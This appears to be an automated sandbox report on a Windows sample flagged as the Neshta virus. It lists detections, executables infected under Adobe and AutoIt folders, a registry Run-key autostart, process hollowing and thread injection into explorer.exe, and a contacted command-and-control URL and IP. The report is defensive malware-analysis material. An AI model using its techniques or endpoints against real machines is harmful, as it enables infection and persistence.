          behaviorgraph top1 signatures2 2 Behavior Graph ID: 432848 Sample: vi0EwpbUht Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for dropped file 2->81 83 9 other signatures 2->83 11 vi0EwpbUht.exe 4 2->11         started        process3 file4 55 C:\Windows\svchost.com, PE32 11->55 dropped 57 C:\Users\user\AppData\Local\...\setup.exe, PE32 11->57 dropped 59 C:\Users\user\AppData\...\vi0EwpbUht.exe, PE32 11->59 dropped 61 10 other malicious files 11->61 dropped 123 Creates an undocumented autostart registry key 11->123 125 Drops PE files with a suspicious file extension 11->125 127 Drops executable to a common third party application directory 11->127 129 Infects executable files (exe, dll, sys, html) 11->129 15 vi0EwpbUht.exe 1 21 11->15         started        signatures5 process6 file7 63 C:\Users\user\AppData\Roaming\...\elxhan.exe, PE32 15->63 dropped 65 C:\Users\user\AppData\Local\...\System.dll, PE32 15->65 dropped 71 Detected unpacking (changes PE section rights) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Tries to detect virtualization through RDTSC time measurements 15->75 19 vi0EwpbUht.exe 15->19         started        signatures8 process9 signatures10 85 Modifies the context of a thread in another process (thread injection) 19->85 87 Maps a DLL or memory area into another process 19->87 89 Sample uses process hollowing technique 19->89 91 Queues an APC in another process (thread injection) 19->91 22 explorer.exe 19->22 injected process11 dnsIp12 67 www.agileintelligence.coach 22->67 69 agileintelligence.coach 34.102.136.180, 49753, 80 GOOGLEUS United States 22->69 99 System process connects to network (likely due to code injection or exploit) 22->99 101 Drops executables to the windows directory (C:\Windows) and starts them 22->101 103 Uses netstat to query active network connections and open ports 22->103 26 svchost.com 2 22->26         started        30 NETSTAT.EXE 22->30         started        32 help.exe 22->32         started        signatures13 process14 file15 47 C:\...\protocolhandler.exe, PE32 26->47 dropped 49 C:\Program Files (x86)\...\misc.exe, PE32 26->49 dropped 51 C:\Program Files (x86)\...\lynchtmlconv.exe, PE32 26->51 dropped 53 98 other malicious files 26->53 dropped 111 Sample is not signed and drops a device driver 26->111 113 Drops executable to a common third party application directory 26->113 115 Infects executable files (exe, dll, sys, html) 26->115 34 elxhan.exe 17 26->34         started        117 Modifies the context of a thread in another process (thread injection) 30->117 119 Maps a DLL or memory area into another process 30->119 121 Tries to detect virtualization through RDTSC time measurements 30->121 38 cmd.exe 1 30->38         started        signatures16 process17 file18 45 C:\Users\user\AppData\Local\...\System.dll, PE32 34->45 dropped 93 Detected unpacking (changes PE section rights) 34->93 95 Maps a DLL or memory area into another process 34->95 97 Tries to detect virtualization through RDTSC time measurements 34->97 40 elxhan.exe 34->40         started        43 conhost.exe 38->43         started        signatures19 process20 signatures21 105 Modifies the context of a thread in another process (thread injection) 40->105 107 Maps a DLL or memory area into another process 40->107 109 Sample uses process hollowing technique 40->109

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          vi0EwpbUht.exe91%MetadefenderBrowse
          vi0EwpbUht.exe100%ReversingLabsWin32.Virus.Neshta
          vi0EwpbUht.exe100%AviraW32/Neshta.A
          vi0EwpbUht.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%AviraW32/Neshta.A
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Uninstall.exe100%AviraW32/Neshta.A
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Neshta.A
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%Joe Sandbox ML
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Uninstall.exe100%Joe Sandbox ML
          C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%Joe Sandbox ML
          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe96%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe96%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe96%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe97%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%ReversingLabsWin32.Virus.Neshta
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe91%MetadefenderBrowse
          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%ReversingLabsWin32.Virus.Neshta

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.vi0EwpbUht.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File
          7.1.elxhan.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.vi0EwpbUht.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          17.2.NETSTAT.EXE.292ed78.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.2.svchost.com.400000.0.unpack100%AviraW32/Neshta.ADownload File
          3.1.vi0EwpbUht.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.elxhan.exe.22b0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.vi0EwpbUht.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.elxhan.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.elxhan.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          17.2.NETSTAT.EXE.328f834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          3.0.vi0EwpbUht.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.0.vi0EwpbUht.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.2.vi0EwpbUht.exe.2ff0000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.svchost.com.400000.0.unpack100%AviraW32/Neshta.ADownload File
          6.0.elxhan.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          2.2.vi0EwpbUht.exe.30e0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.vi0EwpbUht.exe.400000.0.unpack100%AviraW32/Neshta.ADownload File
          7.0.elxhan.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          4.0.explorer.exe.1183f834.74.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.agileintelligence.coach/xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ==0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.personalizedyardsigns.com/xkcp/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          agileintelligence.coach
          		34.102.136.180
          		truefalse
            		unknown
            www.agileintelligence.coach
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.agileintelligence.coach/xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ==false
              • Avira URL Cloud: safe
              		unknown
              www.personalizedyardsigns.com/xkcp/true
              • Avira URL Cloud: safe
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorErrorvi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpfalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_Errorvi0EwpbUht.exe, vi0EwpbUht.exe, 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp, vi0EwpbUht.exe, 00000003.00000000.322686039.0000000000409000.00000008.00020000.sdmpfalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fonts.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 00000004.00000000.373376340.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        34.102.136.180
                                        		agileintelligence.coachUnited States
                                        		15169GOOGLEUSfalse

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:432848
                                        Start date:10.06.2021
                                        Start time:20:52:17
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 15m 8s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:vi0EwpbUht (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:24
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.spre.troj.evad.winEXE@15/122@1/1
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 40% (good quality ratio 37.6%)
                                        • Quality average: 75.5%
                                        • Quality standard deviation: 29.6%
                                        HCA Information:
                                        • Successful, ratio: 88%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                        • Created / dropped Files have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 40.88.32.150, 20.50.102.62, 93.184.221.240, 51.103.5.159, 92.122.213.194, 92.122.213.247, 20.54.104.15, 20.54.7.98, 20.54.26.129, 23.57.80.111
                                        • Excluded domains from analysis (whitelisted): a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/432848/sample/vi0EwpbUht.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        20:53:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                        20:53:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run gmsauh C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                        20:53:20API Interceptor1x Sleep call for process: elxhan.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exevOR0HQg11L.exeGet hashmaliciousBrowse
                                          svchost.exeGet hashmaliciousBrowse
                                            svchost.exeGet hashmaliciousBrowse
                                              2018cf61_by_Libranalysis.exeGet hashmaliciousBrowse
                                                41cDVt18DA.exeGet hashmaliciousBrowse
                                                  FgTUClgDjQ.exeGet hashmaliciousBrowse
                                                    ORDER-021406_pdf.jarGet hashmaliciousBrowse
                                                      TT-INVI000000000.exeGet hashmaliciousBrowse
                                                        explorer.exeGet hashmaliciousBrowse
                                                          ITEMS_LIST.exeGet hashmaliciousBrowse
                                                            DB0127718.exeGet hashmaliciousBrowse
                                                              Itinerary.pdf.exeGet hashmaliciousBrowse
                                                                Neshta virus.exeGet hashmaliciousBrowse
                                                                  54nwZp1aPg.exeGet hashmaliciousBrowse
                                                                    qpFvMReV7S.exeGet hashmaliciousBrowse
                                                                      M7oBhU5A6m.exeGet hashmaliciousBrowse
                                                                        nqVQ8G1ylC.exeGet hashmaliciousBrowse
                                                                          mtsendmail.exeGet hashmaliciousBrowse
                                                                            mtloganalyser.exeGet hashmaliciousBrowse
                                                                              contig.exeGet hashmaliciousBrowse
                                                                                C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exevOR0HQg11L.exeGet hashmaliciousBrowse
                                                                                  svchost.exeGet hashmaliciousBrowse
                                                                                    svchost.exeGet hashmaliciousBrowse
                                                                                      2018cf61_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                        41cDVt18DA.exeGet hashmaliciousBrowse
                                                                                          FgTUClgDjQ.exeGet hashmaliciousBrowse
                                                                                            ORDER-021406_pdf.jarGet hashmaliciousBrowse
                                                                                              TT-INVI000000000.exeGet hashmaliciousBrowse
                                                                                                explorer.exeGet hashmaliciousBrowse
                                                                                                  ITEMS_LIST.exeGet hashmaliciousBrowse
                                                                                                    DB0127718.exeGet hashmaliciousBrowse
                                                                                                      Itinerary.pdf.exeGet hashmaliciousBrowse
                                                                                                        Neshta virus.exeGet hashmaliciousBrowse
                                                                                                          54nwZp1aPg.exeGet hashmaliciousBrowse
                                                                                                            qpFvMReV7S.exeGet hashmaliciousBrowse
                                                                                                              M7oBhU5A6m.exeGet hashmaliciousBrowse
                                                                                                                nqVQ8G1ylC.exeGet hashmaliciousBrowse
                                                                                                                  mtsendmail.exeGet hashmaliciousBrowse
                                                                                                                    mtloganalyser.exeGet hashmaliciousBrowse
                                                                                                                      contig.exeGet hashmaliciousBrowse

                                                                                                                        Created / dropped Files

                                                                                                                        C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.278258254187173
